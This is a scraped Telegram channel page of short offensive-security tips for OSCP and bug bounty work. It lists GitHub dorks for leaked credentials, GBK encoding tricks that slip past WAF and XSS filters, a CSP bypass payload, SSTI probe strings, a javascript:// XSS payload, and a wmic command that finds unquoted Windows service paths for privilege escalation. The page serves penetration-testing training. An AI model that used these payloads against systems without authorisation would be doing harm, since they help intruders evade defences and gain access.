πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
8.1K subscribers
162 photos
1 video
27 files
64 links
Offensive Security Certified Professional
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
Github Dorks Cheatsheet

Find files with sensitive info, API Keys, Tokens and Passwords.

+ list of github dorks automation tools
πŸ‘14❀4πŸ€”3πŸ‘Ž1
Windows useful Directories
❀35πŸ‘15
Chrome has just unleashed popovers: modal dialogs without JS! Of course you can abuse them for XSS filter evasion
❀13πŸ”₯5πŸ‘1
Periodical reminder: it's possible to navigate sub-tabs (like Repeater entries) from the keyboard.

You simply have to configure the actions "Go to previous tab" and "Go to next tab".

Burp Suite
As Burp Suite is developed in Java, regexes may use embedded flag expressions like "(?m)"

Here's a detailled description of all the possibilities (including embedded flags, character classes, quantifiers, groups, ...)
πŸ‘7❀2πŸŽ‰1
Bug Bounty Tip

GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a β‡’ %0A
嘍 = %E5%98%8D = \u560d β‡’ %0D
嘾 = %E5%98%BE = \u563e β‡’ %3E (>)
嘼 = %E5%98%BC = \u563c β‡’ %3C (<)
嘒 = %E5%98%A2 = \u5622 β‡’ %22 (')
嘧 = %E5%98%A7 = \u5627 β‡’ %27 (")

For XSS, CRLF, WAF bypass
❀6πŸ‘3
CSP Protection Bypass (using Google domain)

/o/oauth2/revoke?callback=alert(1);console.log
❀9πŸ”₯1
Useful for local privesc on Windows systems; find unquoted service path using the following:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

#OSCP #Windows
πŸ‘12
https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation


Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
πŸ‘3
Bug Bounty Tip

SSTI (Server Side Template Injection) Payload List

πŸ”Ή{7*7}
πŸ”Ή*{7*7}
πŸ”Ή{{7*7}}
πŸ”Ή[[7*7]]
πŸ”Ή${7*7}
πŸ”Ή@(7*7)
πŸ”Ή<?=7*7?>
πŸ”Ή<%= 7*7 %>
πŸ”Ή${= 7*7}
πŸ”Ή{{= 7*7}}
πŸ”Ή${{7*7}}
πŸ”Ή#{7*7}
πŸ”Ή[=7*7]

If evaluated as 49 - the target is vulnerable
πŸ‘11
Bug Bounty Tip

When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com

Then, use these symbols
to craft an XSS payload
πŸ”Ή%0a
πŸ”Ή%0d
πŸ”Ή%E2%80%A8
πŸ”Ή%E2%80%A9

βœ… javascript://test.com%0aalert(1)
πŸ‘13❀1